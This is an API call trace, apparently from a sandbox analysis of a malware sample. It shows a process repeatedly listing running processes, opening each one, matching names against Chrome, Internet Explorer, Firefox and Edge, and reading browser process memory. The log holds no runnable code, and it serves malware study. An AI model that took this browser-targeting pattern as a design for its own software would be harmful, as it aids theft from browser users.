	[0253.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.626] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0253.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.626] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0253.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.626] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.627] NtQueryInformationProcess (in: ProcessHandle=0xa9b4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0253.627] ReadProcessMemory (in: hProcess=0xa9b4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0253.627] ReadProcessMemory (in: hProcess=0xa9b4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0253.627] ReadProcessMemory (in: hProcess=0xa9b4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0253.627] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0253.627] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0253.628] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xa9b8
	[0253.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.628] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0253.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.629] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0253.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.629] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0253.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.629] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.629] NtQueryInformationProcess (in: ProcessHandle=0xa9b8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0253.630] ReadProcessMemory (in: hProcess=0xa9b8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0253.630] ReadProcessMemory (in: hProcess=0xa9b8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0253.630] ReadProcessMemory (in: hProcess=0xa9b8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0253.630] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0253.630] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0253.631] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xa9bc
	[0253.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.631] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0253.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.631] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.632] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0253.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.632] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.632] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0253.633] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xa9c0
	[0253.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.633] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0253.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.633] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.634] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0253.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.634] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.634] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.635] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xa9c4
	[0253.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.635] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.636] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.636] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.636] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.637] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.637] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.638] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xa9c8
	[0253.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.638] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.639] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.639] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.639] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.639] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.640] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xa9cc
	[0253.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.640] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.641] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.680] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.680] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.681] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0253.682] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xa9d0
	[0253.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.682] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0253.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.682] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.683] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0253.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.683] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.683] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.684] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xa9d4
	[0253.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.684] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.685] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.685] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.685] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.686] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.686] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xa9d8
	[0253.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.687] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.687] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.687] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.688] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.688] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0253.689] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xa9dc
	[0253.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.689] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0253.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.690] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.690] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0253.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.690] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.690] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0253.691] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xa9e0
	[0253.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.691] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.692] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.692] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.692] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.693] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0253.693] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xa9e4
	[0253.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.694] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0253.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.694] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.694] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0253.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.694] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.695] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.695] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xa9e8
	[0253.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.695] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.696] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.696] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.697] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.697] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0253.697] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xa9ec
	[0253.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.698] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0253.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.698] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.698] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0253.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.698] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.699] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0253.700] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xa9f0
	[0253.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.700] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.700] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.700] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.701] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.701] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0253.702] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xa9f4
	[0253.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.702] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0253.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.702] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.703] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0253.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.703] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.703] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0253.704] CloseHandle (hObject=0x4fd0) returned 1
	[0253.704] Sleep (dwMilliseconds=0x64) 
	[0253.813] GetCurrentProcessId () returned 0x110
	[0253.813] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0253.818] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0253.819] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0253.820] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0253.821] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xa9f8
	[0253.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.822] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0253.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.822] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.822] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0253.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.823] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.823] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0253.824] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xa9fc
	[0253.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.824] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0253.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.824] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.825] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0253.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.825] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.825] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0253.826] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xaa00
	[0253.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.826] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0253.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.827] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.827] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0253.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.828] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.828] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0253.829] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xaa04
	[0253.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.829] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0253.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.830] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.830] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0253.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.831] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.831] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0253.832] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xaa08
	[0253.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.832] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0253.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.832] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.833] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0253.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.833] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
